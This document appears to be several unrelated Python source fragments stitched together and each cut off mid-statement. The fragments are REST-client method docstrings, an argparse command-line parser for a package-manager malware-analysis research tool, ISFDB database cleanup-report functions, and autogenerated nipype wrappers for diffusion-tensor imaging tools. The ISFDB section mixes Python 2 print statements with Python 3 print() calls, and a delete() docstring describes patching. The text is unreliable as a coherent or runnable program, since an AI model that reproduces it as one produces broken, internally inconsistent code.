message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' put method.
Returns:
dict: Response object from the server.
Raises:
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
return self.get_json_from_response(self.send_request("put", *args, **kwargs))
def patch(self, *args, **kwargs):
"""Generic method to patch data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' patch method.
Returns:
dict: Response object from the server.
Raises:
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
return self.get_json_from_response(self.send_request("patch", *args, **kwargs))
def delete(self, *args, **kwargs):
"""Generic method to patch data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is | |
import argparse
import sys
from util.enum_util import PackageManagerEnum, LanguageEnum, DistanceAlgorithmEnum, TraceTypeEnum, DataTypeEnum
def parse_args(argv):
parser = argparse.ArgumentParser(prog="maloss", description="Parse arguments")
subparsers = parser.add_subparsers(help='Command (e.g. crawl )', dest='cmd')
# select pm
parser_select_pm = subparsers.add_parser("select_pm", help="Select the package manager satisfying criteria!")
parser_select_pm.add_argument("-t", "--threshold", default=100000, type=int,
help="Threshold for number of packages to pick package managers")
# select packages
parser_select_pkg = subparsers.add_parser("select_pkg", help="Select packages based on popularity!")
parser_select_pkg.add_argument("infile", help="Path to the input file.")
parser_select_pkg.add_argument("outfile", help="Path to the output file.")
parser_select_pkg.add_argument("-f", "--field", dest="field",
help="The field to rank/filter on packages. Can be overall or last_month or use_count. "
"default is overall and then last_month.")
select_pkg_criteria = parser_select_pkg.add_mutually_exclusive_group(required=True)
select_pkg_criteria.add_argument("-n", "--top_n_pkgs", default=0, type=int,
help="Pick the top n packages ranked by total downloads")
select_pkg_criteria.add_argument("-t", "--threshold", default=0, type=int,
help="Threshold for total number of downloads to pick packages")
# crawl
parser_crawl = subparsers.add_parser("crawl", help="Crawl the source sites for different package managers!")
parser_crawl.add_argument("package_manager", default=PackageManagerEnum.pypi, type=PackageManagerEnum,
choices=list(PackageManagerEnum), help="Name of the package manager to crawl")
parser_crawl.add_argument("-i", "--infile", dest="infile", help="Path to the input file.")
parser_crawl.add_argument("-s", "--stats", dest="stats", action="store_true", help="Crawl statistics.")
parser_crawl.add_argument("-p", "--processes", dest="processes", default=1, type=int,
help="Number of processes to use if stats is enabled")
parser_crawl.add_argument("outfile", help="Path to the output file, format is csv.")
# edit distance
parser_edit_dist = subparsers.add_parser("edit_dist", help="Compute the edit distance for packages!")
parser_edit_dist.add_argument("source", help="Path to the list of packages as source in comparison")
parser_edit_dist.add_argument("-t", "--target", dest="target",
help="Optional path to list of packages as target in comparison. If not specified, use source as target.")
parser_edit_dist.add_argument("outfile", help="Path to the output file, format is csv.")
parser_edit_dist.add_argument("--pair_outfile", help="Path to the optional pair output file, format is csv.")
parser_edit_dist.add_argument("-a", "--algorithm", dest="algorithm", default=DistanceAlgorithmEnum.py_edit_distance,
type=DistanceAlgorithmEnum, choices=list(DistanceAlgorithmEnum), help="Distance algorithm to use")
parser_edit_dist.add_argument("-b", "--batch_size", dest="batch_size", default=10000, type=int,
help="Batch size of packages in comparison. Split large list to avoid out of memory.")
parser_edit_dist.add_argument("--threshold", dest="threshold", default=2, type=int,
help="The threshold of edit distance to filter comparison results.")
parser_edit_dist.add_argument("-p", "--processes", dest="processes", default=1, type=int,
help="Number of processes to use")
# get versions
parser_get_versions = subparsers.add_parser("get_versions", help="Get versions for the packages!")
parser_get_versions.add_argument("infile", help="Path to the input file of packages.")
parser_get_versions.add_argument("outfile", help="Path to the output file.")
parser_get_versions.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_get_versions.add_argument("--max_num", dest="max_num", type=int, help="Maximum number of versions to consider")
parser_get_versions.add_argument("--min_gap_days", dest="min_gap_days", type=int,
help="If max_num is specified (>=), the minimum gap days for filtering versions")
parser_get_versions.add_argument("--with_time", dest="with_time", action="store_true", help="Fetch timestamp as well")
parser_get_versions.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# get author
parser_get_author = subparsers.add_parser("get_author", help="Get author for the packages!")
parser_get_author.add_argument("infile", help="Path to the input file of packages.")
parser_get_author.add_argument("outfile", help="Path to the output file.")
parser_get_author.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_get_author.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# get stats
parser_get_stats = subparsers.add_parser("get_stats", help="Get stats for the packages!")
parser_get_stats.add_argument("infile", help="Path to the input file of packages.")
parser_get_stats.add_argument("outfile", help="Path to the output file.")
parser_get_stats.add_argument("-m", "--package_manager", type=PackageManagerEnum, choices=list(PackageManagerEnum),
help="Package manager of the specified input.")
# get package metadata and versions
parser_get_metadata = subparsers.add_parser("get_metadata", help="Get metadata and versions for the specified package!")
parser_get_metadata.add_argument("-n", "--package_name", required=True, dest="package_name", help="Package name.")
parser_get_metadata.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_get_metadata.add_argument("-i", "--isolate_pkg_info", action="store_true",
help="Isolate package info into different directories!")
parser_get_metadata.add_argument("-v", "--package_version", dest="package_version", help="Package version")
parser_get_metadata.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# get package dependency
parser_get_dep = subparsers.add_parser("get_dep", help="Get dependency for the specified package!")
parser_get_dep.add_argument("-n", "--package_name", required=True, dest="package_name", help="Package name.")
parser_get_dep.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_get_dep.add_argument("-i", "--isolate_pkg_info", action="store_true",
help="Isolate package info into different directories!")
parser_get_dep.add_argument("-v", "--package_version", dest="package_version", help="Package version")
parser_get_dep.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# build package dependency tree for airflow DAG execution
parser_build_dep = subparsers.add_parser("build_dep", help="Build the dependency graph!")
parser_build_dep.add_argument("infile", help="Path to the input file of packages.")
parser_build_dep.add_argument("outfile", help="Path to the output file.")
parser_build_dep.add_argument("-c", "--cache_dir", dest="cache_dir", required=True,
help="Path to the cache dir for metadata/dep.")
parser_build_dep.add_argument("-v", "--record_version", dest="record_version", action="store_true",
help="Record versions in the dep graph. Default is to consider the latest version.")
parser_build_dep.add_argument("-l", "--language", dest="language", default=LanguageEnum.python, type=LanguageEnum,
choices=list(LanguageEnum), help="Language of the specified input.")
# build author package graph
parser_build_author = subparsers.add_parser("build_author", help="Build the author-package graph!")
parser_build_author.add_argument("outfile", help="Path to the output file.")
parser_build_author.add_argument("-i", "--infiles", dest="infiles", nargs='+', help="List of input files.")
parser_build_author.add_argument("-t", "--top_authors", dest="top_authors",
help="Path to the top authors output file.")
parser_build_author.add_argument("-l", "--languages", dest="languages", nargs='+', type=LanguageEnum,
choices=list(LanguageEnum), help="Language of the specified input.")
# split package dependency tree into n copies
parser_split_graph = subparsers.add_parser("split_graph", help="Split a graph into n copies!")
parser_split_graph.add_argument("infile", help="Path to the input file of packages.")
parser_split_graph.add_argument("out_dir", help="Path to the output directory.")
parser_split_graph.add_argument("-k", "--k_out_dirs", type=int, help="Number of out_dirs to store splitted files")
split_graph_algo = parser_split_graph.add_mutually_exclusive_group(required=True)
split_graph_algo.add_argument("-n", "--num_outputs", type=int,
help="Number of outputs to split the input file into!")
split_graph_algo.add_argument("-s", "--seedfile", help="List of seed packages that must be in subgraph.")
parser_split_graph.add_argument("-d", "--dagfile", dest="dagfile", help="Path to the dag file for infile.")
# install specified package
parser_install = subparsers.add_parser("install", help="Install the specified package!")
parser_install.add_argument("-n", "--package_name", required=True, dest="package_name", help="Package name.")
parser_install.add_argument("-i", "--install_dir", dest="install_dir", help="path to the install dir.")
parser_install.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_install.add_argument("-o", "--out_dir", dest="out_dir", help="Path to the tracing output.")
parser_install.add_argument("-t", "--trace", dest="trace", action="store_true", help="Trace the program.")
parser_install.add_argument("--trace_string_size", dest="trace_string_size", type=int, help="String size in trace")
parser_install.add_argument("-s", "--sudo", dest="sudo", action="store_true", help="Run with sudo privilege.")
parser_install.add_argument("-v", "--package_version", dest="package_version", help="Package version")
parser_install.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# parse source file and generate ast
parser_astgen = subparsers.add_parser("astgen", help="Generate Abstract Syntax Tree from source files")
parser_astgen.add_argument("inpath", help="Path to the input directory or file")
parser_astgen.add_argument("outfile", help="Path to the output file.")
parser_astgen.add_argument("-b", "--root", dest="root", help="Path to the root of the source.")
parser_astgen.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
parser_astgen.add_argument("-n", "--package_name", dest="package_name",
help="Package name of the specified input.")
parser_astgen.add_argument("-v", "--package_version", dest="package_version",
help="Package version of the specified input.")
parser_astgen.add_argument("-e", "--evaluate_smt", dest="evaluate_smt", action="store_true",
help="Evaluate the smt formula in the astgen output.")
parser_astgen.add_argument("-c", "--configpath", dest="configpath",
help="Optional path to the filter of nodes, stored in proto buffer format (AstLookupConfig in ast.proto).")
# filter the packages based on specified SMT formula
parser_astfilter = subparsers.add_parser("astfilter", help="Filter the packages based on specified SMT formula")
parser_astfilter.add_argument("-n", "--package_name", required=True, dest="package_name",
help="Package name of the specified input.")
parser_astfilter.add_argument("-v", "--package_version", dest="package_version",
help="Package version of the specified input.")
parser_astfilter.add_argument("--ignore_dep_version", dest="ignore_dep_version", action="store_true",
help="Ignore the version for dependencies and use their latest versions.")
parser_astfilter.add_argument("--ignore_dep", dest="ignore_dep", action="store_true",
help="Ignore the dependencies and analyze only the specified package.")
parser_astfilter.add_argument("-d", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_astfilter.add_argument("-o", "--out_dir", required=True, dest="out_dir", help="Path to analysis output dir.")
parser_astfilter.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
parser_astfilter.add_argument("-m", "--package_manager", type=PackageManagerEnum, choices=list(PackageManagerEnum),
help="Package manager of the specified input.")
parser_astfilter.add_argument("-c", "--configpath", dest="configpath",
help="Optional path to the filter of nodes, stored in proto buffer format (AstLookupConfig in ast.proto).")
# run taint analysis on the specified package
parser_taint = subparsers.add_parser("taint", help="Run taint analysis on the specified package")
parser_taint.add_argument("-n", "--package_name", required=True, dest="package_name",
help="Package name of the specified input.")
parser_taint.add_argument("-v", "--package_version", dest="package_version",
help="Package version of the specified input.")
parser_taint.add_argument("-i", "--inpath", dest="inpath",
help="Path to the input directory or file. If specified, don't check dependencies.")
parser_taint.add_argument("--ignore_dep_version", dest="ignore_dep_version", action="store_true",
help="Ignore the version for dependencies and use their latest versions.")
parser_taint.add_argument("--ignore_dep", dest="ignore_dep", action="store_true",
help="Ignore the dependencies and analyze only the specified package.")
parser_taint.add_argument("-d", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_taint.add_argument("-o", "--out_dir", required=True, dest="out_dir", help="Path to analysis output dir.")
parser_taint.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
parser_taint.add_argument("-c", "--configpath", dest="configpath",
help="Optional path to the filter of nodes, stored in proto buffer format (AstLookupConfig in ast.proto).")
# run filter_pkg analysis on list of packages
parser_filter_pkg = subparsers.add_parser("filter_pkg", help="Filter package based on selected criteria, e.g. api, flow")
parser_filter_pkg.add_argument("infile", help="Path to the input file of packages.")
parser_filter_pkg.add_argument("outfile", help="Path to the output file.")
parser_filter_pkg.add_argument("-d", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_filter_pkg.add_argument("-o", "--out_dir", required=True, dest="out_dir", help="Path to analysis output dir.")
parser_filter_pkg.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
parser_filter_pkg.add_argument("-c", "--configpath", dest="configpath",
help="Reduced filter of nodes, stored in proto buffer format (AstLookupConfig in ast.proto).")
# run danger api analysis on the specified package
parser_danger = | |
class="table2">'
award_cat_id = record[0][AWARD_CAT_ID]
award_cat_name = record[0][AWARD_CAT_NAME]
print '<td>%s</td>' % ISFDBLink('award_category.cgi', award_cat_id, award_cat_name)
print '</tr>'
record = result.fetch_row()
bgcolor ^= 1
print '</table>'
else:
print '<h3>No empty Award Categories found</h3>'
def function27():
    """Cleanup report 27: title series that contain CHAPBOOK titles."""
    query = """select s.series_id, s.series_title from series s, cleanup c where
                c.record_id=s.series_id and c.report_type=27 and exists
                (select 1 from titles t where t.title_ttype='CHAPBOOK'
                and t.series_id = s.series_id)
                order by s.series_title"""
    db.query(query)
    result = db.store_result()
    if not result.num_rows():
        print("<h2>No records found</h2>")
        return
    PrintTableColumns(('', 'Series',))
    shade = 1
    row_number = 1
    row = result.fetch_row()
    while row:
        PrintSeriesRecord(row[0][0], row[0][1], shade, row_number)
        shade ^= 1
        row_number += 1
        row = result.fetch_row()
    print("</table>")
def function28():
    """Cleanup report 28: CHAPBOOK titles that have a synopsis."""
    query = """select t.title_id, t.title_title from titles t, cleanup c
               where t.title_ttype='CHAPBOOK' and t.title_synopsis !=0
               and c.record_id=t.title_id and c.report_type=28 order by t.title_title"""
    db.query(query)
    result = db.store_result()
    if not result.num_rows():
        print("<h2>No records found</h2>")
        return
    PrintTableColumns(('', 'Title',))
    shade = 1
    row_number = 1
    row = result.fetch_row()
    while row:
        PrintTitleRecord(row[0][0], row[0][1], shade, row_number)
        shade ^= 1
        row_number += 1
        row = result.fetch_row()
    print("</table>")
def function29():
    """Cleanup report 29: CHAPBOOK pubs with no fiction/poem/serial content."""
    query = """select pub_id, pub_title from pubs, cleanup
               where pub_ctype='CHAPBOOK' and NOT EXISTS
               (select 1 from pub_content,titles where pubs.pub_id=pub_content.pub_id
               and pub_content.title_id=titles.title_id and (titles.title_ttype='SHORTFICTION'
               or titles.title_ttype='POEM' or titles.title_ttype='SERIAL'))
               and pubs.pub_id=cleanup.record_id and cleanup.report_type=29
               order by pub_title"""
    db.query(query)
    result = db.store_result()
    if not result.num_rows():
        print("<h2>No records found</h2>")
        return
    PrintTableColumns(('', 'Publication Title'))
    shade = 1
    row_number = 1
    row = result.fetch_row()
    while row:
        PrintPublicationRecord(row[0][0], row[0][1], shade, row_number)
        shade ^= 1
        row_number += 1
        row = result.fetch_row()
    print("</table>")
def function30():
    """Cleanup report 30: CHAPBOOK titles whose parent/variant type differs."""
    query = """select t1.title_id, t1.title_title from titles t1, titles t2, cleanup c where
               t1.title_ttype='CHAPBOOK' and t2.title_parent=t1.title_id and t2.title_ttype!='CHAPBOOK'
               and (t1.title_id=c.record_id or t2.title_id=c.record_id) and c.report_type=30
               UNION select t1.title_id,t1.title_title from titles t1, titles t2, cleanup c where
               t1.title_ttype!='CHAPBOOK' and t2.title_parent=t1.title_id and t2.title_ttype='CHAPBOOK'
               and (t1.title_id=c.record_id or t2.title_id=c.record_id) and c.report_type=30"""
    db.query(query)
    result = db.store_result()
    if not result.num_rows():
        print("<h2>No records found</h2>")
        return
    PrintTableColumns(('', 'Title',))
    shade = 1
    row_number = 1
    row = result.fetch_row()
    while row:
        PrintTitleRecord(row[0][0], row[0][1], shade, row_number)
        shade ^= 1
        row_number += 1
        row = result.fetch_row()
    print("</table>")
def function31():
    """Cleanup report 31: pubs whose ISBN-10/13 form disagrees with the pub date."""
    query = """select c.cleanup_id, p.pub_id, p.pub_isbn, p.pub_year from pubs p, cleanup c
               where ((p.pub_isbn like '97%' and length(replace(p.pub_isbn,'-',''))=13
               and p.pub_year <'2005-00-00' and p.pub_year !='0000-00-00') or
               (p.pub_isbn not like '#%' and length(replace(p.pub_isbn,'-',''))=10
               and p.pub_year>'2008-00-00' and p.pub_year !='8888-00-00' and
               p.pub_year !='9999-00-00')) and p.pub_id=c.record_id and
               c.report_type=31 and c.resolved IS NULL order by pub_year, pub_isbn"""
    db.query(query)
    result = db.store_result()
    if not result.num_rows():
        print('<h2>No records found</h2>')
        return
    PrintTableColumns(('Count', 'Date', 'ISBN', ''))
    shade = 1
    row_number = 1
    row = result.fetch_row()
    while row:
        # alternate the two table row styles
        print('<tr align=left class="%s">' % ("table1" if shade else "table2"))
        print('<td>%d</td>' % row_number)
        print('<td>%s</td>' % row[0][3])
        print('<td>%s</td>' % ISFDBLink('pl.cgi', row[0][1], row[0][2]))
        print('<td>%s</td>' % ISFDBLink('mod/resolve_cleanup.cgi',
                                        '%s+1+31' % row[0][0],
                                        'Ignore this ISBN'))
        print('</tr>')
        shade ^= 1
        row_number += 1
        row = result.fetch_row()
    print('</table>')
def function32():
    """Cleanup report 32: publications sharing a duplicate publication tag."""
    query = """select p1.pub_id, p1.pub_tag, p1.pub_title from pubs p1,
               (select pub_tag, count(*) from pubs, cleanup c where pubs.pub_id=c.record_id
               and c.report_type=32 group by pub_tag having count(*) > 1) p2
               where p1.pub_tag = p2.pub_tag order BY 2,1,3"""
    db.query(query)
    result = db.store_result()
    if not result.num_rows():
        print("<h2>No records found</h2>")
        return
    PrintTableColumns(('Publication Title', 'Publication Tag'))
    shade = 1
    row = result.fetch_row()
    while row:
        print('<tr align=left class="%s">' % ("table1" if shade else "table2"))
        print('<td>%s</td>' % ISFDBLink('pl.cgi', row[0][0], row[0][2]))
        print('<td>%s</td>' % row[0][1])
        print('</tr>')
        shade ^= 1
        row = result.fetch_row()
    print("</table>")
def function33():
    """Cleanup report 33: pub authors missing from the canonical author list."""
    query = """select p.pub_id, p.pub_title as order_title, pa.author_id, a.author_canonical
               from pub_authors pa, pubs p, pub_content pc, titles t, authors a, cleanup
               where pa.pub_id = p.pub_id
               and pc.title_id = t.title_id
               and pc.pub_id = p.pub_id
               and pa.author_id = a.author_id
               and p.pub_ctype in ('ANTHOLOGY','NOVEL','COLLECTION','NONFICTION','OMNIBUS','CHAPBOOK')
               and t.title_ttype in ('ANTHOLOGY','NOVEL','COLLECTION','OMNIBUS','NONFICTION','CHAPBOOK')
               and t.title_ttype = p.pub_ctype
               and not exists
               (select 1 from canonical_author ca
               where ca.title_id = t.title_id and pa.author_id = ca.author_id)
               and p.pub_id=cleanup.record_id and cleanup.report_type=33
               UNION
               select p.pub_id, p.pub_title as order_title, pa.author_id, a.author_canonical
               from pub_authors pa, pubs p, pub_content pc, titles t, authors a, cleanup
               where pa.pub_id = p.pub_id
               and pc.title_id = t.title_id
               and pc.pub_id = p.pub_id
               and pa.author_id = a.author_id
               and p.pub_ctype in ('FANZINE','MAGAZINE')
               and t.title_ttype = 'EDITOR'
               and t.title_language != 26
               and not exists
               (select 1 from canonical_author ca
               where ca.title_id = t.title_id and pa.author_id = ca.author_id)
               and p.pub_id=cleanup.record_id and cleanup.report_type=33
               order by order_title"""
    db.query(query)
    result = db.store_result()
    if not result.num_rows():
        print('<h2>No records found</h2>')
        return
    PrintTableColumns(('', 'Title', 'Author'))
    shade = 1
    row_number = 1
    row = result.fetch_row()
    while row:
        print('<tr align=left class="%s">' % ("table1" if shade else "table2"))
        print('<td>%d</td>' % row_number)
        print('<td>%s</td>' % ISFDBLink('pl.cgi', row[0][0], row[0][1]))
        print('<td>%s</td>' % ISFDBLink('ea.cgi', row[0][2], row[0][3]))
        print('</tr>')
        shade ^= 1
        row_number += 1
        row = result.fetch_row()
    print('</table>')
def function34():
    """Cleanup report 34: publications whose only content is COVERART."""
    query = """select pub_id, pub_title from pubs, cleanup
               where not exists
               (select 1 from pub_content pc, titles t
               where pubs.pub_id = pc.pub_id
               and pc.title_id = t.title_id
               and t.title_ttype != 'COVERART')
               and pubs.pub_id=cleanup.record_id
               and cleanup.report_type=34
               order by pubs.pub_title"""
    db.query(query)
    result = db.store_result()
    if not result.num_rows():
        print("<h2>No records found</h2>")
        return
    PrintTableColumns(('', 'Publication Title',))
    shade = 1
    row_number = 1
    row = result.fetch_row()
    while row:
        PrintPublicationRecord(row[0][0], row[0][1], shade, row_number)
        shade ^= 1
        row_number += 1
        row = result.fetch_row()
    print("</table>")
def function35():
formats = "'" + "','".join(FORMATS) + "'"
query = """select pubs.pub_ptype, pubs.pub_id, pubs.pub_title from pubs, cleanup where
pubs.pub_ptype not in (%s) and pubs.pub_ptype IS NOT NULL and pubs.pub_ptype !=''
and pubs.pub_id=cleanup.record_id and cleanup.report_type=35
order by pubs.pub_ptype, pubs.pub_title""" % (formats)
db.query(query)
result = db.store_result()
if not result.num_rows():
print '<h2>No matching records</h2>'
return
PrintTableColumns(('Format', 'Publication'))
bgcolor = 1
record = result.fetch_row()
while record:
format = record[0][0]
pub_id = record[0][1]
pub_title = record[0][2]
if bgcolor:
print '<tr align=left class="table1">'
else:
print '<tr align=left class="table2">'
print '<td>%s</td>' % format
print '<td>'
print ISFDBLink('pl.cgi', pub_id, pub_title)
print '</td>'
print '</tr>'
bgcolor ^= 1
record = result.fetch_row()
print '</table>'
def function36():
query = """select pub_id, pub_title, pub_frontimage from pubs, cleanup
where pubs.pub_frontimage!='' and pubs.pub_frontimage is not null
and pubs.pub_id=cleanup.record_id and cleanup.report_type=36"""
domains = RecognizedDomains()
for domain in domains:
# Skip domains that are "recognized", but we don't have permission to link to
if domain[3] == 0:
continue
query += " and pubs.pub_frontimage not like '%"
query += "%s" % domain[0]
query += "%'"
query += " order by pubs.pub_frontimage"
db.query(query)
result = db.store_result()
record = result.fetch_row()
if not record:
print "<h2>No records found</h2>"
return
bgcolor = 1
PrintTableColumns(('Publication', 'URL'))
while record:
if bgcolor:
print '<tr align=left class="table1">'
else:
print '<tr align=left class="table2">'
print '<td>%s</td>' % ISFDBLink('pl.cgi', record[0][0], record[0][1])
print '<td><a href="%s">%s</a></td>' % (record[0][2], record[0][2])
print '</tr>'
bgcolor ^= 1
record = result.fetch_row()
print "</table>"
def function37():
nonModeratorMessage()
query = """select p.pub_id, p.pub_title, c.cleanup_id
from pubs p, cleanup c
where p.pub_ctype='OMNIBUS'
and p.pub_id=c.record_id
and c.report_type=37
and c.resolved is NULL
and NOT EXISTS
(select 1 from pub_content pc, titles t
where p.pub_id=pc.pub_id
and pc.title_id=t.title_id
and t.title_ttype in ('NOVEL', 'COLLECTION', 'ANTHOLOGY', 'NONFICTION')
)
order by p.pub_title"""
db.query(query)
result = db.store_result()
num = result.num_rows()
if num > 0:
record = result.fetch_row()
PrintTableColumns(('', 'Publication Title', 'Ignore'))
bgcolor = 1
count = 1
while record:
pub_id = record[0][0]
pub_title = record[0][1]
cleanup_id = record[0][2]
PrintPublicationRecord(pub_id, pub_title, bgcolor, count, cleanup_id, 37)
bgcolor ^= 1
count += 1
record = result.fetch_row()
print '</table>'
else:
print '<h2>No records found</h2>'
def function38():
query = 'select pc.pub_id, pc.title_id, count(*) as cnt \
from pub_content pc, cleanup c \
where pc.pub_id=c.record_id and c.report_type=38 \
group by pc.pub_id, pc.title_id having cnt>1'
db.query(query)
result = db.store_result()
num = result.num_rows()
pubs = {}
titles = {}
pub_data = {}
title_data = {}
record = result.fetch_row()
while record:
pub_id = record[0][0]
# Skip records where pub_id is NULL -- they will have to be cleaned up manually
if not pub_id:
record = result.fetch_row()
continue
title_id = record[0][1]
count = record[0][2]
pub_data[pub_id] = SQLGetPubById(pub_id)
title_data[title_id] = SQLloadTitle(title_id)
if pub_id not in pubs:
pubs[pub_id] = [(title_id, count), ]
else:
pubs[pub_id].append((title_id, count), )
record = result.fetch_row()
if not pubs:
print "<h2>No publications with duplicate titles found</h2>"
return
bgcolor = 1
PrintTableColumns(('Publication', 'Duplicate Titles (count)'))
for pub_id in pubs:
titles = pubs[pub_id]
pub_title = pub_data[pub_id][PUB_TITLE]
if bgcolor:
print '<tr align=left class="table1">'
else:
print '<tr align=left class="table2">'
print '<td>%s</td>' % ISFDBLink('pl.cgi', pub_id, pub_title)
print '<td>'
first = 1
| |
# -*- coding: utf-8 -*-
"""Autogenerated file - DO NOT EDIT
If you spot a bug, please report it on the mailing list and/or change the generator."""
import os
from ...base import (CommandLine, CommandLineInputSpec, SEMLikeCommandLine,
TraitedSpec, File, Directory, traits, isdefined,
InputMultiPath, OutputMultiPath)
class dtiaverageInputSpec(CommandLineInputSpec):
    # Input spec for the dtiaverage command-line wrapper below; each trait's
    # ``argstr`` is the literal flag emitted on the generated command line.
    inputs = InputMultiPath(File(exists=True), desc="List of all the tensor fields to be averaged", argstr="--inputs %s...")
    # Either(Bool, File): True lets nipype auto-name the output file (see
    # _outputs_filenames on the interface class); a File names it explicitly.
    # hash_files=False keeps the output path out of the input hash.
    tensor_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Averaged tensor volume", argstr="--tensor_output %s")
    DTI_double = traits.Bool(desc="Tensor components are saved as doubles (cannot be visualized in Slicer)", argstr="--DTI_double ")
    verbose = traits.Bool(desc="produce verbose output", argstr="--verbose ")
class dtiaverageOutputSpec(TraitedSpec):
    # Produced when ``tensor_output`` is requested on the input spec.
    tensor_output = File(desc="Averaged tensor volume", exists=True)
class dtiaverage(SEMLikeCommandLine):
    """title: DTIAverage (DTIProcess)
category: Diffusion.Diffusion Tensor Images.CommandLineOnly
description: dtiaverage is a program that allows to compute the average of an arbitrary number of tensor fields (listed after the --inputs option) This program is used in our pipeline as the last step of the atlas building processing. When all the tensor fields have been deformed in the same space, to create the average tensor field (--tensor_output) we use dtiaverage.
Several average method can be used (specified by the --method option): euclidian, log-euclidian and pga. The default being euclidian.
version: 1.0.0
documentation-url: http://www.slicer.org/slicerWiki/index.php/Documentation/Nightly/Extensions/DTIProcess
license: Copyright (c)  <NAME>. All rights reserved.
See http://www.ia.unc.edu/dev/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.  See the above copyright notices for more information.
contributor: <NAME>
"""
    # Wiring for the SEMLikeCommandLine machinery: trait specs defined above.
    input_spec = dtiaverageInputSpec
    output_spec = dtiaverageOutputSpec
    # Executable invoked (surrounding spaces come from the generator).
    _cmd = " dtiaverage "
    # Default output filename used when tensor_output is passed as True.
    _outputs_filenames = {'tensor_output': 'tensor_output.nii'}
    # Tool does not need an X display.
    _redirect_x = False
class dtiestimInputSpec(CommandLineInputSpec):
    # Input spec for the dtiestim DWI->tensor estimation wrapper below.
    dwi_image = File(desc="DWI image volume (required)", exists=True, argstr="--dwi_image %s")
    # The Either(Bool, File) outputs follow the usual SEM pattern: True asks
    # nipype to auto-generate the filename (see _outputs_filenames), a File
    # names it explicitly; hash_files=False keeps paths out of the input hash.
    tensor_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Tensor OutputImage", argstr="--tensor_output %s")
    B0 = traits.Either(traits.Bool, File(), hash_files=False, desc="Baseline image, average of all baseline images", argstr="--B0 %s")
    idwi = traits.Either(traits.Bool, File(), hash_files=False, desc="idwi output image. Image with isotropic diffusion-weighted information = geometric mean of diffusion images", argstr="--idwi %s")
    B0_mask_output = traits.Either(traits.Bool, File(), hash_files=False, desc="B0 mask used for the estimation. B0 thresholded either with the -t option value or the automatic OTSU value", argstr="--B0_mask_output %s")
    brain_mask = File(desc="Brain mask. Image where for every voxel == 0 the tensors are not estimated. Be aware that in addition a threshold based masking will be performed by default. If such an additional threshold masking is NOT desired, then use option -t 0.",
                      exists=True, argstr="--brain_mask %s")
    bad_region_mask = File(desc="Bad region mask. Image where for every voxel > 0 the tensors are not estimated", exists=True, argstr="--bad_region_mask %s")
    # NOTE(review): "Esitmation" typo below originates in the upstream tool's
    # XML description; this file is autogenerated, so it is left unchanged.
    method = traits.Enum("lls", "wls", "nls", "ml", desc="Esitmation method (lls:linear least squares, wls:weighted least squares, nls:non-linear least squares, ml:maximum likelihood)", argstr="--method %s")
    correction = traits.Enum("none", "zero", "abs", "nearest", desc="Correct the tensors if computed tensor is not semi-definite positive", argstr="--correction %s")
    threshold = traits.Int(desc="Baseline threshold for estimation. If not specified calculated using an OTSU threshold on the baseline image.", argstr="--threshold %d")
    weight_iterations = traits.Int(desc="Number of iterations to recaluate weightings from tensor estimate", argstr="--weight_iterations %d")
    step = traits.Float(desc="Gradient descent step size (for nls and ml methods)", argstr="--step %f")
    sigma = traits.Float(argstr="--sigma %f")
    DTI_double = traits.Bool(desc="Tensor components are saved as doubles (cannot be visualized in Slicer)", argstr="--DTI_double ")
    verbose = traits.Bool(desc="produce verbose output", argstr="--verbose ")
    defaultTensor = InputMultiPath(traits.Float, desc="Default tensor used if estimated tensor is below a given threshold", sep=",", argstr="--defaultTensor %s")
    shiftNeg = traits.Bool(
